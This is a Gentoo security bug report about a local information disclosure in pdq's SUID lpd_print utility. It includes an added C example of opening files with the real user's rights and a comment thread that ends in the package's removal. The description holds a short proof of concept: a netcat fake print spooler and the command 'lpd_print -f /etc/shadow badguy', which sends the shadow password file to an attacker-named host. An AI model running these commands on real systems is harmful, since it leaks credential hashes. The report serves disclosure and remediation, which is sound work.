
Bug 84647

Summary: net-print/pdq: local information disclosure
Product: Gentoo Security
Reporter: Sune Kloppenborg Jeppesen (RETIRED) <jaervosz>
Component: Vulnerabilities
Assignee: Gentoo Security <security>
Status: RESOLVED FIXED
Severity: enhancement
CC: lanius
Priority: High    
Version: unspecified   
Hardware: All   
OS: All   
Whiteboard: B4 [upstream+ removed] jaervosz
Package list:
Runtime testing required: ---

Description Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev 2005-03-09 10:32:33 UTC
The print system pdq includes a few utilities which are installed SUID
root. One of these is lpd_print, a program that sends a file to a
remote print spooler. It lets the user choose a data file to be sent
(the -f option), but it doesn't check if the real user is allowed to
access the file.

The local attacker might use another machine to act as a fake print
spooler, e.g.:

  badguy# perl -e 'sleep(15);$|=1;print"\0\0\0\0"' | nc -l -p 515

Root privileges are needed to bind nc to a low port. The attacker is
now able to send any file to the remote host (badguy) and have it
displayed on the console:

  victim$ lpd_print -f /etc/shadow badguy


The vulnerability exists in pdq-2.2.1.

Pdq appears to be no longer maintained. I've tried to contact the
author, Jacob A. Langford, with no success. It seems that both of his
e-mail addresses that I was able to find (langford@uiuc.edu and
langford@karman.tam.uiuc.edu) are no longer working.
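
The missing check, shown as an added example that is not part of the original report or of pdq's source: a SUID program can open the user-supplied data file under the real user's identity, so the kernel applies that user's permissions at open time. `open_as_real_user` is a hypothetical helper name, and the code assumes the program needs its privileges back after the open.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

/* Open `path` read-only with the rights of the invoking (real) user rather
 * than the SUID owner. Returns an fd, or -1 with errno set.
 * The permission check and the open are a single step, so there is no
 * access()-then-open() window in which the path could be swapped. */
int open_as_real_user(const char *path)
{
    uid_t saved_euid = geteuid();
    gid_t saved_egid = getegid();
    int fd, saved_errno;

    /* Drop the group first: once the effective uid is unprivileged,
     * changing the effective gid may no longer be permitted. */
    if (setegid(getgid()) != 0)
        return -1;
    if (seteuid(getuid()) != 0) {
        saved_errno = errno;
        if (setegid(saved_egid) != 0)
            abort();                    /* never continue in a mixed state */
        errno = saved_errno;
        return -1;
    }

    fd = open(path, O_RDONLY | O_NOCTTY);   /* checked against the real user */
    saved_errno = errno;

    /* Assumption: privileges are needed again later, so restore them
     * (uid first, then gid). The fd stays bound to the file opened above. */
    if (seteuid(saved_euid) != 0 || setegid(saved_egid) != 0)
        abort();
    errno = saved_errno;
    return fd;
}

int main(int argc, char **argv)
{
    if (argc != 2) { fprintf(stderr, "usage: %s FILE\n", argv[0]); return EXIT_FAILURE; }
    int fd = open_as_real_user(argv[1]);
    if (fd < 0) { perror(argv[1]); return EXIT_FAILURE; }
    printf("opened %s as uid %ld\n", argv[1], (long)getuid());
    close(fd);
    return EXIT_SUCCESS;
}
```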
Comment 1 Matthias Geerdsen (RETIRED) gentoo-dev 2005-03-10 11:59:43 UTC
- ebuild has hardly been touched
- SF project page doesn't indicate any activity

Not totally sure how widely used this is (gentoo-stats lists 2 systems which have it btw), but maybe we should consider masking it if nobody comes up with a patch.
Comment 2 Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev 2005-03-27 02:05:39 UTC
Heinrich please advise.
Comment 3 Heinrich Wendel (RETIRED) gentoo-dev 2005-03-27 04:35:28 UTC
I'm for masking it
Comment 4 Thierry Carrez (RETIRED) gentoo-dev 2005-04-02 02:43:37 UTC
Declared public by discoverer (Michal Wojciechowski)
I agree we should mask it.
Comment 5 solar (RETIRED) gentoo-dev 2005-04-04 08:52:18 UTC
net-print/pdq is now package.masked in revision 1.3792 per request.
Comment 6 Thierry Carrez (RETIRED) gentoo-dev 2005-04-04 08:59:06 UTC
Will stay masked a while prior to complete removal, moving to enhancement scope.
Comment 7 Robert Paskowitz (RETIRED) gentoo-dev 2005-05-16 14:55:45 UTC
Probably about time to remove this from the tree. It's been masked for over a month, and upstream hasn't made a release for over 5 years, so I don't think it's going to get fixed.
Comment 8 Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev 2005-05-18 22:34:28 UTC
Heinrich are we ready to remove this from the tree? 
Comment 9 Heinrich Wendel (RETIRED) gentoo-dev 2005-05-19 07:16:28 UTC
no objections here, do you remove it or shall I?
Comment 10 Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev 2005-05-19 07:24:14 UTC
Heinrich please do it. 
Comment 11 Heinrich Wendel (RETIRED) gentoo-dev 2005-05-19 07:28:37 UTC
removed pdq 
Comment 12 Thierry Carrez (RETIRED) gentoo-dev 2005-05-19 07:38:55 UTC
RIP